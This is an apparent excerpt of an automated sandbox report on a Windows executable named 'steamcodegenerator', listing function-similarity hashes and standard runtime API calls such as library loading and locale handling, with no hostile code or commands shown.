                                                                                                                          • String ID:
                                                                                                                          • API String ID:
                                                                                                                          • Opcode ID: 1d23d0e9da3076ad5b774ad45d8636280020e110bd3dbb24153443ce06125473
                                                                                                                          • Instruction ID: e96dee6f0413b6be3e4e0279c33bec210d198eaa40433303b9e70a94d3f70aaa
                                                                                                                          • Opcode Fuzzy Hash: 1d23d0e9da3076ad5b774ad45d8636280020e110bd3dbb24153443ce06125473
                                                                                                                          • Instruction Fuzzy Hash: 6BF0C271B18A918ADBA89F68A883669B7E0F709390F90C439D68D83F04C73C9460CF14
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000000.00000002.3399017355.00007FF71C051000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF71C050000, based on PE: true
                                                                                                                          • Associated: 00000000.00000002.3398992673.00007FF71C050000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.3399053616.00007FF71C07B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.3399091958.00007FF71C08C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.3399120497.00007FF71C08F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_0_2_7ff71c050000_steamcodegenerator.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID:
                                                                                                                          • String ID:
                                                                                                                          • API String ID:
                                                                                                                          • Opcode ID: c20acefe3a69058f9053b966004725b6699a124ed001c4cc8db5546ddce4a23b
                                                                                                                          • Instruction ID: de38aa6ba6667d631a131f355c55fe45009280074621fb8b9231f6ad06100650
                                                                                                                          • Opcode Fuzzy Hash: c20acefe3a69058f9053b966004725b6699a124ed001c4cc8db5546ddce4a23b
                                                                                                                          • Instruction Fuzzy Hash: B9A00125918E52D1FB48AB80AD690B0A631AB51320BA00131D65D424A19F2CA449D668
                                                                                                                          APIs
                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000000.00000002.3399017355.00007FF71C051000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF71C050000, based on PE: true
                                                                                                                          • Associated: 00000000.00000002.3398992673.00007FF71C050000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.3399053616.00007FF71C07B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.3399091958.00007FF71C08C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.3399120497.00007FF71C08F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_0_2_7ff71c050000_steamcodegenerator.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: std::_$Lockit$Lockit::_Lockit::~_$Facet_Register
                                                                                                                          • String ID: ios_base::badbit set$ios_base::eofbit set$ios_base::failbit set
                                                                                                                          • API String ID: 459529453-1866435925
                                                                                                                          • Opcode ID: 3937cb2de45063989f30ed65fb080d1dae6c25b6e2d9b3e18489dfea4281ca75
                                                                                                                          • Instruction ID: 214820b9d7058eb571e25606f18b54caba4a1cf10084453f95629af9bcc518de
                                                                                                                          • Opcode Fuzzy Hash: 3937cb2de45063989f30ed65fb080d1dae6c25b6e2d9b3e18489dfea4281ca75
                                                                                                                          • Instruction Fuzzy Hash: F7B18C22A09E8186EA14EB95E8813F9A3B0FF85BA4FA58136EB5D03755DF3CD449C710
                                                                                                                          APIs
                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000000.00000002.3399017355.00007FF71C051000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF71C050000, based on PE: true
                                                                                                                          • Associated: 00000000.00000002.3398992673.00007FF71C050000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.3399053616.00007FF71C07B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.3399091958.00007FF71C08C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.3399120497.00007FF71C08F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_0_2_7ff71c050000_steamcodegenerator.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: Concurrency::cancel_current_taskstd::_$Lockit$Locinfo::_Locinfo_ctorLockit::_Lockit::~_
                                                                                                                          • String ID: bad locale name$false$true
                                                                                                                          • API String ID: 4121308752-1062449267
                                                                                                                          • Opcode ID: a0846c2aa12d742fa10dac8f3bd10f58a2c9fa8587503aeb1b9c9460052203b9
                                                                                                                          • Instruction ID: 06ab2c8a57ef350b7f1d5f46c63d325c1eddf0e20e7656321bba24b8e5bb039c
                                                                                                                          • Opcode Fuzzy Hash: a0846c2aa12d742fa10dac8f3bd10f58a2c9fa8587503aeb1b9c9460052203b9
                                                                                                                          • Instruction Fuzzy Hash: 74617F22A09B418AEB10EFA0E8502FCB7B4EF44754FA44534DB4D57AA6DF3DE459C720
                                                                                                                          APIs
                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000000.00000002.3399017355.00007FF71C051000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF71C050000, based on PE: true
                                                                                                                          • Associated: 00000000.00000002.3398992673.00007FF71C050000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.3399053616.00007FF71C07B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.3399091958.00007FF71C08C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.3399120497.00007FF71C08F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_0_2_7ff71c050000_steamcodegenerator.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: BlockFrameHandler3::Unwind$CatchExecutionHandlerIs_bad_exception_allowedSearchStatestd::bad_alloc::bad_alloc
                                                                                                                          • String ID: csm$csm$csm
                                                                                                                          • API String ID: 849930591-393685449
                                                                                                                          • Opcode ID: a990464a9b0ebae1c73dc8e44a8328145eb2f0c0011acfcadcc99229f563dc94
                                                                                                                          • Instruction ID: 1974a637a503be3aafa8c776968667b425c405939da0cf1938fc6e1ac4088ba9
                                                                                                                          • Opcode Fuzzy Hash: a990464a9b0ebae1c73dc8e44a8328145eb2f0c0011acfcadcc99229f563dc94
                                                                                                                          • Instruction Fuzzy Hash: 86D18F32A08F418BEB20ABA598412FDB7B0FB457A8FA00135DB4D57B55DF38E585CB20
                                                                                                                          APIs
                                                                                                                          • FreeLibrary.KERNEL32(?,?,?,?,00007FF71C06217D,?,?,?,?,00007FF71C056424,?,?,?,00007FF71C054660), ref: 00007FF71C06B570
                                                                                                                          • GetProcAddress.KERNEL32(?,?,?,?,00007FF71C06217D,?,?,?,?,00007FF71C056424,?,?,?,00007FF71C054660), ref: 00007FF71C06B57C
                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000000.00000002.3399017355.00007FF71C051000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF71C050000, based on PE: true
                                                                                                                          • Associated: 00000000.00000002.3398992673.00007FF71C050000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.3399053616.00007FF71C07B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.3399091958.00007FF71C08C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.3399120497.00007FF71C08F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_0_2_7ff71c050000_steamcodegenerator.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: AddressFreeLibraryProc
                                                                                                                          • String ID: api-ms-$ext-ms-
                                                                                                                          • API String ID: 3013587201-537541572
                                                                                                                          • Opcode ID: 485021a0a37bf4d08527970241f82041fbd12763ed629b207983ccd9ca274b15
                                                                                                                          • Instruction ID: ecdfc387f023275dc9dc1d74a6b5656d465a86bd820e30d148eca4e83a5a3a7c
                                                                                                                          • Opcode Fuzzy Hash: 485021a0a37bf4d08527970241f82041fbd12763ed629b207983ccd9ca274b15
                                                                                                                          • Instruction Fuzzy Hash: 0741C171B19F1281EA16AF96AC446F5A394BF44BB0FE84635DE1D47B84EF3CE4099320
                                                                                                                          APIs
                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000000.00000002.3399017355.00007FF71C051000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF71C050000, based on PE: true
                                                                                                                          • Associated: 00000000.00000002.3398992673.00007FF71C050000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.3399053616.00007FF71C07B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.3399091958.00007FF71C08C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.3399120497.00007FF71C08F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_0_2_7ff71c050000_steamcodegenerator.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: _invalid_parameter_noinfo
                                                                                                                          • String ID: f$p$p
                                                                                                                          • API String ID: 3215553584-1995029353
                                                                                                                          • Opcode ID: c526f3c0768fe9bb32e6b0cf3c5b34720bc9ff458adbcfce366da728eaeb86fb
                                                                                                                          • Instruction ID: 3d46f4b3da3263defc20ea967816c136d42c89fb4784d603a0dbacb27ae648f2
                                                                                                                          • Opcode Fuzzy Hash: c526f3c0768fe9bb32e6b0cf3c5b34720bc9ff458adbcfce366da728eaeb86fb
                                                                                                                          • Instruction Fuzzy Hash: F51292A1F0C96386FB247E9498546FDF691FB40764FE44235E789476C4DB3CE6888B20
                                                                                                                          APIs
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000000.00000002.3399017355.00007FF71C051000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF71C050000, based on PE: true
                                                                                                                          • Associated: 00000000.00000002.3398992673.00007FF71C050000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.3399053616.00007FF71C07B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.3399091958.00007FF71C08C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.3399120497.00007FF71C08F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_0_2_7ff71c050000_steamcodegenerator.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: _invalid_parameter_noinfo
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 3215553584-0
                                                                                                                          • Opcode ID: 0bb0a586f61f888d0fabcc55a92c509517cdfc5ef6cb14ed48e5264dfe45f05a
                                                                                                                          • Instruction ID: 65f7b429c42f4c2691d24861debd1a11d37e28bc81ef3af61fb6256303daa204
                                                                                                                          • Opcode Fuzzy Hash: 0bb0a586f61f888d0fabcc55a92c509517cdfc5ef6cb14ed48e5264dfe45f05a
                                                                                                                          • Instruction Fuzzy Hash: 16C1B322B08F9685E661AF9598442FDB691EF81BA0FB54135EA5E03391DF7CEC4DC320
                                                                                                                          APIs
                                                                                                                          • LoadLibraryExW.KERNEL32(?,?,?,00007FF71C05E53E,?,?,?,00007FF71C05E230,?,?,?,00007FF71C05AE11), ref: 00007FF71C05E311
                                                                                                                          • GetLastError.KERNEL32(?,?,?,00007FF71C05E53E,?,?,?,00007FF71C05E230,?,?,?,00007FF71C05AE11), ref: 00007FF71C05E31F
                                                                                                                          • LoadLibraryExW.KERNEL32(?,?,?,00007FF71C05E53E,?,?,?,00007FF71C05E230,?,?,?,00007FF71C05AE11), ref: 00007FF71C05E349
                                                                                                                          • FreeLibrary.KERNEL32(?,?,?,00007FF71C05E53E,?,?,?,00007FF71C05E230,?,?,?,00007FF71C05AE11), ref: 00007FF71C05E3B7
                                                                                                                          • GetProcAddress.KERNEL32(?,?,?,00007FF71C05E53E,?,?,?,00007FF71C05E230,?,?,?,00007FF71C05AE11), ref: 00007FF71C05E3C3
                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000000.00000002.3399017355.00007FF71C051000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF71C050000, based on PE: true
                                                                                                                          • Associated: 00000000.00000002.3398992673.00007FF71C050000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.3399053616.00007FF71C07B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.3399091958.00007FF71C08C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.3399120497.00007FF71C08F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_0_2_7ff71c050000_steamcodegenerator.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: Library$Load$AddressErrorFreeLastProc
                                                                                                                          • String ID: api-ms-
                                                                                                                          • API String ID: 2559590344-2084034818
                                                                                                                          • Opcode ID: 3e1fd3a685f2033975e74a960ce108ae537942f5f0739880e328c386ea771c15
                                                                                                                          • Instruction ID: e6c507d88697b68b790f9c9122f1daff374d0f3f38e3ffa65bca6c57221d24cb
                                                                                                                          • Opcode Fuzzy Hash: 3e1fd3a685f2033975e74a960ce108ae537942f5f0739880e328c386ea771c15
                                                                                                                          • Instruction Fuzzy Hash: 9831B52161AF0192EB15BB92AC045B9A3A4BF14B70FE94535DE6D0B750EF3CE848C220
                                                                                                                          APIs
                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000000.00000002.3399017355.00007FF71C051000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF71C050000, based on PE: true
                                                                                                                          • Associated: 00000000.00000002.3398992673.00007FF71C050000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.3399053616.00007FF71C07B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.3399091958.00007FF71C08C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.3399120497.00007FF71C08F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_0_2_7ff71c050000_steamcodegenerator.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: Lockitstd::_$Lockit::_Lockit::~_
                                                                                                                          • String ID: invalid string position$@F
                                                                                                                          • API String ID: 593203224-3046666360
                                                                                                                          • Opcode ID: 4a0e63c30155dbd531933714e4fb3250fae38a20e05bdf120d2de5344a78d97b
                                                                                                                          • Instruction ID: fb2d118290556d8372b8e6d18af6b319b16a728741f2468fd6b125b33d5ecbc7
                                                                                                                          • Opcode Fuzzy Hash: 4a0e63c30155dbd531933714e4fb3250fae38a20e05bdf120d2de5344a78d97b
                                                                                                                          • Instruction Fuzzy Hash: 41317E21A08F4286EA64FB95ED411F9A370EB54BA4FE90532DB4D03395DF3CE449C721
                                                                                                                          APIs
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000000.00000002.3399017355.00007FF71C051000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF71C050000, based on PE: true
                                                                                                                          • Associated: 00000000.00000002.3398992673.00007FF71C050000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.3399053616.00007FF71C07B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.3399091958.00007FF71C08C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.3399120497.00007FF71C08F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_0_2_7ff71c050000_steamcodegenerator.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: Value$ErrorLast
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 2506987500-0
                                                                                                                          • Opcode ID: 1be884a4e317a723df3c05ed33de2d7cd5181bc24a5a1d7764a1952c9c9cbb42
                                                                                                                          • Instruction ID: 257704bd86eb8d77d3a3abf4bfd7190719b66e9985303e10b66b2c2996bcc59e
                                                                                                                          • Opcode Fuzzy Hash: 1be884a4e317a723df3c05ed33de2d7cd5181bc24a5a1d7764a1952c9c9cbb42
                                                                                                                          • Instruction Fuzzy Hash: 37213E20F0CE6645F5547BE65E461B9F295AF487B0FF44634EA2E07AC6DF2CA4494220
                                                                                                                          APIs
                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000000.00000002.3399017355.00007FF71C051000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF71C050000, based on PE: true
                                                                                                                          • Associated: 00000000.00000002.3398992673.00007FF71C050000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.3399053616.00007FF71C07B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.3399091958.00007FF71C08C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.3399120497.00007FF71C08F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_0_2_7ff71c050000_steamcodegenerator.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: ConsoleWrite$CloseCreateErrorFileHandleLast
                                                                                                                          • String ID: CONOUT$
                                                                                                                          • API String ID: 3230265001-3130406586
                                                                                                                          • Opcode ID: 694d1561b49bf98eabe73384ab34ca1d62e8bc3aa0c95dc252714f74f68b0a54
                                                                                                                          • Instruction ID: da52f63b9aebe1a3a7e8516c8dd745a29c2b3ab98e28c02501b43b66dd255aa5
                                                                                                                          • Opcode Fuzzy Hash: 694d1561b49bf98eabe73384ab34ca1d62e8bc3aa0c95dc252714f74f68b0a54
                                                                                                                          • Instruction Fuzzy Hash: 82118431A18F4186E354AB86FC493B9A3A0FB48BF4F644234DA9D87B94DF3CD5488754
                                                                                                                          APIs
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000000.00000002.3399017355.00007FF71C051000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF71C050000, based on PE: true
                                                                                                                          • Associated: 00000000.00000002.3398992673.00007FF71C050000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.3399053616.00007FF71C07B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.3399091958.00007FF71C08C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.3399120497.00007FF71C08F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_0_2_7ff71c050000_steamcodegenerator.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: ByteCharMultiStringWide
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 2829165498-0
                                                                                                                          • Opcode ID: 56c1881ff080da115e17173811a025af0d6ab41ce3f93a68b9c841ae504a7f9c
                                                                                                                          • Instruction ID: 7ee871f1b3f1dfb772125a7330c8814fa7a00a3f3da7ce78442cf3db3401709e
                                                                                                                          • Opcode Fuzzy Hash: 56c1881ff080da115e17173811a025af0d6ab41ce3f93a68b9c841ae504a7f9c
                                                                                                                          • Instruction Fuzzy Hash: DB819E32A08B4183EB209FA198403B9A7E1FB547A8FA40631EF5D57BD4DF3CD5098720
                                                                                                                          APIs
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000000.00000002.3399017355.00007FF71C051000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF71C050000, based on PE: true
                                                                                                                          • Associated: 00000000.00000002.3398992673.00007FF71C050000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.3399053616.00007FF71C07B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.3399091958.00007FF71C08C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.3399120497.00007FF71C08F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_0_2_7ff71c050000_steamcodegenerator.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: std::_$Lockit$Lockit::_Lockit::~_$Concurrency::cancel_current_taskFacet_Register
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 2081738530-0
                                                                                                                          • Opcode ID: 5b1032962b2f3603510ee43495ab5f1e8501dba359fef9820ab2aefd96205ff8
                                                                                                                          • Instruction ID: f3205c2358f2fb6123f49e418a074dfa841e6a6bad44eaeca81e0ba6235e77ab
                                                                                                                          • Opcode Fuzzy Hash: 5b1032962b2f3603510ee43495ab5f1e8501dba359fef9820ab2aefd96205ff8
                                                                                                                          • Instruction Fuzzy Hash: 1931A222A08E0286EA10BB95ED511F9A371FB44BB4FE84631DB5D47799DF3CE449C720
                                                                                                                          APIs
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000000.00000002.3399017355.00007FF71C051000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF71C050000, based on PE: true
                                                                                                                          • Associated: 00000000.00000002.3398992673.00007FF71C050000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.3399053616.00007FF71C07B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.3399091958.00007FF71C08C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.3399120497.00007FF71C08F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_0_2_7ff71c050000_steamcodegenerator.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: std::_$Lockit$Lockit::_Lockit::~_$Concurrency::cancel_current_taskFacet_Register
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 2081738530-0
                                                                                                                          • Opcode ID: 6dd869cd8eb9f4e4568965f6fff9a5a75bd4238d98132b85c20296b06ff4c309
                                                                                                                          • Instruction ID: 5bc0c537c5563332eb67ae05632cb989f7b6307b4a4b1ad3480eaa8ecd79274e
                                                                                                                          • Opcode Fuzzy Hash: 6dd869cd8eb9f4e4568965f6fff9a5a75bd4238d98132b85c20296b06ff4c309
                                                                                                                          • Instruction Fuzzy Hash: D0317C21E09E4286EA15BB95EC411F8E770EB54BB4FA84632DB1D077A5DF3CE44A8330

APIs: (none listed)
Strings: (none listed)
Memory Dump Source
• Source File: 00000000.00000002.3399017355.00007FF71C051000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF71C050000, based on PE: true
• Associated: 00000000.00000002.3398992673.00007FF71C050000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.3399053616.00007FF71C07B000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.3399091958.00007FF71C08C000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.3399120497.00007FF71C08F000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_7ff71c050000_steamcodegenerator.jbxd
Similarity
• API ID: Is_bad_exception_allowedstd::bad_alloc::bad_alloc
• String ID: csm$csm$csm
• API String ID: 3523768491-393685449
• Opcode ID / Opcode Fuzzy Hash: 56b501d46a3a8898814a296027c8e3984b73c41ebf1f0af9fd66e92a0995a612
• Instruction ID: f19dcd34b0fb00bf3a8d74359b81e054f79aff9159c5c08726b77aca2836f069
• Instruction Fuzzy Hash: BCE19272A08F818BE710ABA4D8812FDB7B0FB49768F644235DB4D47655DF38E589CB10

APIs
• GetLastError.KERNEL32(?,?,00008ABED36B4165,00007FF71C064851,?,?,?,?,00007FF71C06F7CA,?,?,00000000,00007FF71C074803,?,?,?), ref: 00007FF71C06A41F
• FlsSetValue.KERNEL32(?,?,00008ABED36B4165,00007FF71C064851,?,?,?,?,00007FF71C06F7CA,?,?,00000000,00007FF71C074803,?,?,?), ref: 00007FF71C06A455
• FlsSetValue.KERNEL32(?,?,00008ABED36B4165,00007FF71C064851,?,?,?,?,00007FF71C06F7CA,?,?,00000000,00007FF71C074803,?,?,?), ref: 00007FF71C06A482
• FlsSetValue.KERNEL32(?,?,00008ABED36B4165,00007FF71C064851,?,?,?,?,00007FF71C06F7CA,?,?,00000000,00007FF71C074803,?,?,?), ref: 00007FF71C06A493
• FlsSetValue.KERNEL32(?,?,00008ABED36B4165,00007FF71C064851,?,?,?,?,00007FF71C06F7CA,?,?,00000000,00007FF71C074803,?,?,?), ref: 00007FF71C06A4A4
• SetLastError.KERNEL32(?,?,00008ABED36B4165,00007FF71C064851,?,?,?,?,00007FF71C06F7CA,?,?,00000000,00007FF71C074803,?,?,?), ref: 00007FF71C06A4BF
Memory Dump Source
• Source File: 00000000.00000002.3399017355.00007FF71C051000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF71C050000, based on PE: true
• Associated: 00000000.00000002.3398992673.00007FF71C050000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.3399053616.00007FF71C07B000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.3399091958.00007FF71C08C000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.3399120497.00007FF71C08F000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_7ff71c050000_steamcodegenerator.jbxd
Similarity
• API ID: Value$ErrorLast
• String ID: (none)
• API String ID: 2506987500-0
• Opcode ID / Opcode Fuzzy Hash: d929618738324d574e70838d51b97b836a85079287c8504ecfb6e89faa6b9b66
• Instruction ID: e496672b20381ca3ce81274bb39d6f4c796b728818c4d667f1eb1be3a71fedbf
• Instruction Fuzzy Hash: B1114220F08E6241F5547BE66E461B9F2959F887B0FF44734D93E06BD6DF2CE4494260

APIs: (none listed)
Strings: (none listed)
Memory Dump Source
• Source File: 00000000.00000002.3399017355.00007FF71C051000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF71C050000, based on PE: true
• Associated: 00000000.00000002.3398992673.00007FF71C050000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.3399053616.00007FF71C07B000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.3399091958.00007FF71C08C000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.3399120497.00007FF71C08F000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_7ff71c050000_steamcodegenerator.jbxd
Similarity
• API ID: std::_$Lockit$GetctypeLocinfo::_Locinfo_ctorLockit::_Lockit::~_
• String ID: bad locale name
• API String ID: 2967684691-1405518554
• Opcode ID / Opcode Fuzzy Hash: fd94d111b3a5a71e05e2fbcb881251465dc0f2d8c786bed247c494bd29d02914
• Instruction ID: de8a4d30de331d59f7c6f963c926fc9183672b4332b27c126473ac1add7062c1
• Instruction Fuzzy Hash: 46412522B49E418AFB14EFF0D8502FCB3B4AF44758FA44434DF4D26A96EF38955A9320

APIs: (none listed)
Strings: (none listed)
Memory Dump Source
• Source File: 00000000.00000002.3399017355.00007FF71C051000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF71C050000, based on PE: true
• Associated: 00000000.00000002.3398992673.00007FF71C050000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.3399053616.00007FF71C07B000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.3399091958.00007FF71C08C000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.3399120497.00007FF71C08F000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_7ff71c050000_steamcodegenerator.jbxd
Similarity
• API ID: AddressFreeHandleLibraryModuleProc
• String ID: CorExitProcess$mscoree.dll
• API String ID: 4061214504-1276376045
• Opcode ID / Opcode Fuzzy Hash: 559c3951bd7f50195cdf89802e038081bfbf684ad2b4d9a1a4895f21a508b9c3
• Instruction ID: 0ac795df9d6ed2a74716dcfdb4eaddc7c5a13bfb190d608f9a1fa0ecee1c3214
• Instruction Fuzzy Hash: CEF04421B09F0681FA186BA4AC593B9A320AF45B71FE40635C6AD4A9E4CF3CD44DC320

APIs: (none listed)
Memory Dump Source
• Source File: 00000000.00000002.3399017355.00007FF71C051000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF71C050000, based on PE: true
• Associated: 00000000.00000002.3398992673.00007FF71C050000.00000002.00000001.01000000.00000003.sdmp
